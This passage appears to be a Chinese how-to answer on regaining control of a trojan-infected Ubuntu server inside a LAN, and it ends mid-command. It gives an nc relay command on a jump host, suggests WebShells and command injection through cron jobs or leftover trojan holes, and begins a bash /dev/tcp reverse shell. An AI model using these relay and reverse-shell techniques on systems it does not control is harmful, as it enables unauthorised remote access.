Ubuntu服务器中了木马且处于局域网内无法直接通过公网正向连接

如果你的Ubuntu服务器中了木马且处于局域网内无法直接通过公网正向连接，可以尝试以下方法进行应急响应和恢复控制：

一、尝试通过局域网内部访问（优先方案）

如果攻击者未完全封锁你的权限，且你有局域网内其他机器的控制权：

通过跳板机连接：

使用同一局域网内的其他机器作为跳板，通过SSH或工具（如nc）中转连接：

# 在跳板机上监听，转发流量到目标服务器
nc -lvp 4444 -c "nc 目标服务器IP 22"

从外部通过跳板机访问目标服务器。

利用已有服务：

如果目标服务器运行了Web服务（如Apache/Nginx），尝试通过WebShell或上传临时管理脚本（需权限未完全丢失）。

二、利用反向Shell让服务器主动连接你

如果目标服务器仍能出网（允许出站连接到公网或你的控制端）：

在你的控制端监听：

nc -lvp 5555  # 或使用更稳定的工具如socat、msfconsole

在目标服务器触发反向Shell（需有命令执行权限）：

通过定时任务或木马残留漏洞注入命令：

# 使用bash反向连接
bash -i >& /dev/tcp/